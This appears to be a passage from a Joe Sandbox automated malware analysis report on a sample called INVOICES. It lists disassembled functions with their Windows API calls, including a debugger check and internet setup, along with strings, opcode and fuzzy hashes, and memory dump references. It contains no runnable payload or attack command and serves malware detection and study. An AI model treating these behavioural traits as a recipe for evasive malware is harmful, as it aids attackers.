                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: Combobox
                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                  • Opcode ID: 429ce7b84e8d4cf64c8ceacb0b6e56e118b2e7857ce274c5a1ec5b8dc59881aa
                                                                                                                                  • Instruction ID: 1daa51f0280d97543260dfc0fb7052fa0ba4479f29520560ca0bb1608d7b7c3b
                                                                                                                                  • Opcode Fuzzy Hash: 429ce7b84e8d4cf64c8ceacb0b6e56e118b2e7857ce274c5a1ec5b8dc59881aa
                                                                                                                                  • Instruction Fuzzy Hash: 1E118275311208AFEF21DF24CC84FFB376AEB98368F114125FA1497290EA7D9C5187A0
                                                                                                                                  Function 007B6C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00731D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00731D73
                                                                                                                                    • Part of subcall function 00731D35: GetStockObject.GDI32(00000011), ref: 00731D87
                                                                                                                                    • Part of subcall function 00731D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00731D91
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 007B6CA3
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 007B6CBD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                  • Opcode ID: 0311e02d83400d07e043edb076f9469f9d1faaac943d1b80f815e986aa87bc2c
                                                                                                                                  • Instruction ID: 3040920183258bd776cb3d1fd5263b7cfa20c7759c689e5acf7064e5e894c42b
                                                                                                                                  • Opcode Fuzzy Hash: 0311e02d83400d07e043edb076f9469f9d1faaac943d1b80f815e986aa87bc2c
                                                                                                                                  • Instruction Fuzzy Hash: 3F21F972610209AFDB05DFA8DC45EFA7BA8EB08314F054629FE55D2250E639E861DB60
                                                                                                                                  Function 007B6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 007B69D4
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007B69E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                  • String ID: edit
                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                  • Opcode ID: e037a8138ba9ad572daf70eab81cda6813ce7cc2a1036354b451982829d1601b
                                                                                                                                  • Instruction ID: af3ea143870025da66d672f670bb64bc6bcf1e01f1fb45ddb3ab1507dbc6813d
                                                                                                                                  • Opcode Fuzzy Hash: e037a8138ba9ad572daf70eab81cda6813ce7cc2a1036354b451982829d1601b
                                                                                                                                  • Instruction Fuzzy Hash: 63116A71500204ABEB108E64DC44BFB3769EB15768F608728FAA4971E0C73DEC909B60
                                                                                                                                  Function 00792CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00792D1A
                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00792D39
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: 632f668c548e5cd3205ad99bf4b640fc45fda6b80a8dfa25510964d35e4014d5
                                                                                                                                  • Instruction ID: 86135fc68d4ffd5d67acd3e106ffe012c85732adfee24dcc15a1d7f2490adfde
                                                                                                                                  • Opcode Fuzzy Hash: 632f668c548e5cd3205ad99bf4b640fc45fda6b80a8dfa25510964d35e4014d5
                                                                                                                                  • Instruction Fuzzy Hash: 4E11E231E01114BBCF20FB58EC84BAD77A9AB06300F144161ED15AB2A2D738EE07C7A5
                                                                                                                                  Function 007A22EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007A2342
                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007A236B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                  • String ID: <local>
                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                  • Opcode ID: ffd6e4d156bf1745d2cc18a76a3d97da5c50d20ffa57a9e7733f59dce284787f
                                                                                                                                  • Instruction ID: b4fcabcd7b2b531613c380c2c27688e6958e253713a1c7960cb85e13c84411e1
                                                                                                                                  • Opcode Fuzzy Hash: ffd6e4d156bf1745d2cc18a76a3d97da5c50d20ffa57a9e7733f59dce284787f
                                                                                                                                  • Instruction Fuzzy Hash: 7C11E070101225BADF248F168C88EBBFB68EF47751F10836AF94552001D27C6882CAF0
                                                                                                                                  Function 007890C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00789135
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                  • Opcode ID: 3efcbbec909aa5bfe076c6dc5a879e453786beac08caed91526a8a308a054150
                                                                                                                                  • Instruction ID: fcdedea57c834b8deaa6c15332b83b9a92b0df60bc35e0d97afadd9d5e89f871
                                                                                                                                  • Opcode Fuzzy Hash: 3efcbbec909aa5bfe076c6dc5a879e453786beac08caed91526a8a308a054150
                                                                                                                                  • Instruction Fuzzy Hash: 0A01F971A45219EBDB08FB65CC9ACFE7769EF16310B140719F831572C2DA3D5808D710
                                                                                                                                  Function 00798E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                  • String ID: EA06
                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                  • Opcode ID: 760433e1aaae0e9fc026af4e621676dd7859d903a6e012c9c7aea959cb13d75c
                                                                                                                                  • Instruction ID: f9bc328c3bb6c1b487e531ab14e6c33bb6cd79fc00fa7fa56410ff1c6d34c580
                                                                                                                                  • Opcode Fuzzy Hash: 760433e1aaae0e9fc026af4e621676dd7859d903a6e012c9c7aea959cb13d75c
                                                                                                                                  • Instruction Fuzzy Hash: 2A01DD72D04258BEDF28C7A8CC5AEFE7BF8DB15701F00459EF556D2181E9B9E6088B60
                                                                                                                                  Function 00788FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0078902D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                  • Opcode ID: 5908cf764d90430091e27f253c2467daf52a19ac40a7bd9653e2e7b5fd76979c
                                                                                                                                  • Instruction ID: d52a7c8c6fccae25d2f101ce760185e1211421e2dd4ef4c1cfd1a9186c93ffe0
                                                                                                                                  • Opcode Fuzzy Hash: 5908cf764d90430091e27f253c2467daf52a19ac40a7bd9653e2e7b5fd76979c
                                                                                                                                  • Instruction Fuzzy Hash: DB01F7B1A85109EBDB18F7A1CD9AEFF77A8DF15300F14011AB90263282DE2D5E09D371
                                                                                                                                  Function 00789044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 007890B0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                  • Opcode ID: 5caf08d9c19ae1f38143ee4a2448a127afeaebb165e494082ec7d992a470b904
                                                                                                                                  • Instruction ID: 2e6cc78051553894cd262171f1678bbc8183866e4c4c6a0bafdf205edda1dc6f
                                                                                                                                  • Opcode Fuzzy Hash: 5caf08d9c19ae1f38143ee4a2448a127afeaebb165e494082ec7d992a470b904
                                                                                                                                  • Instruction Fuzzy Hash: 2E01D6B1A85119FBDB14F7A5CD8AEFE77AC9F15300F180116B90263282DA2E5E09D372
                                                                                                                                  Function 0078C7AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0078C7F6
                                                                                                                                    • Part of subcall function 0078CB06: _memmove.LIBCMT ref: 0078CB50
                                                                                                                                    • Part of subcall function 0078CB06: VariantInit.OLEAUT32(00000000), ref: 0078CB72
                                                                                                                                    • Part of subcall function 0078CB06: VariantCopy.OLEAUT32(00000000,?), ref: 0078CB7C
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0078C818
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                                  • String ID: d}~
                                                                                                                                  • API String ID: 2932060187-2645811566
                                                                                                                                  • Opcode ID: 837438cb4797af641d06c7b015e8a3ccfa7cb3812c971a705853cd59c1da739c
                                                                                                                                  • Instruction ID: 2459ec4ea98dcc19e405c83dbfd383937f2c453a0ae14cf7a23cec258cb1d511
                                                                                                                                  • Opcode Fuzzy Hash: 837438cb4797af641d06c7b015e8a3ccfa7cb3812c971a705853cd59c1da739c
                                                                                                                                  • Instruction Fuzzy Hash: EA1100719007089FD710DF96D88499BF7F8FF08310B50862EE58AD7611E775A945CF94
                                                                                                                                  Function 00756CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                  • String ID: ~
                                                                                                                                  • API String ID: 3494438863-2703998100
                                                                                                                                  • Opcode ID: 12d205667c5604b8dc3177fd0380041b8400442b28a87740338f2ff346b3264a
                                                                                                                                  • Instruction ID: 9920e74f74c4478948c111b3652cabd73eab549c6c359419d5e8e966ea278f00
                                                                                                                                  • Opcode Fuzzy Hash: 12d205667c5604b8dc3177fd0380041b8400442b28a87740338f2ff346b3264a
                                                                                                                                  • Instruction Fuzzy Hash: DCF0AFB1309B128BEB649B19FC116F127A4FB15321B904E26EA04CF196E7BC9884C699
                                                                                                                                  Function 00794FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                  • String ID: #32770
                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                  • Opcode ID: 29eecf7adb0873fba76110e4b258ff384ed9dc74145d82ccad2c273840bd9c3f
                                                                                                                                  • Instruction ID: 3a980469df1db66b6cad49eade36c05a936e3747b87e723bfcc3b5582f641ba6
                                                                                                                                  • Opcode Fuzzy Hash: 29eecf7adb0873fba76110e4b258ff384ed9dc74145d82ccad2c273840bd9c3f
                                                                                                                                  • Instruction Fuzzy Hash: 95E0617250022D27D710D759AC09FA7F7ACEB04770F000057FC04D3050D9649A1587D5
                                                                                                                                  Function 0076B441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0076B494: _memset.LIBCMT ref: 0076B4A1
                                                                                                                                    • Part of subcall function 00750AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(007F4158,00000000,007F4144,0076B470,?,?,?,0073100A), ref: 00750AC5
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0073100A), ref: 0076B474
                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0073100A), ref: 0076B483
                                                                                                                                  Strings
                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0076B47E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                  • API String ID: 3158253471-631824599
                                                                                                                                  • Opcode ID: 309a1bad2188defd7dc55977952f07fbe31c7390e1a1e53b093e747dd23c780a
                                                                                                                                  • Instruction ID: 1b01f8b2cf6c49a2c690fd88f9df1337ba5a1f02dd20bd4be5550bd6e06b28e8
                                                                                                                                  • Opcode Fuzzy Hash: 309a1bad2188defd7dc55977952f07fbe31c7390e1a1e53b093e747dd23c780a
                                                                                                                                  • Instruction Fuzzy Hash: 9AE06DB02007408BD320AF38D808B467BE0BF00704F01CA6DE842C3342EBBCD885CBA1
                                                                                                                                  Function 007B59CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007B59D7
                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007B59EA
                                                                                                                                    • Part of subcall function 007952EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795363
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
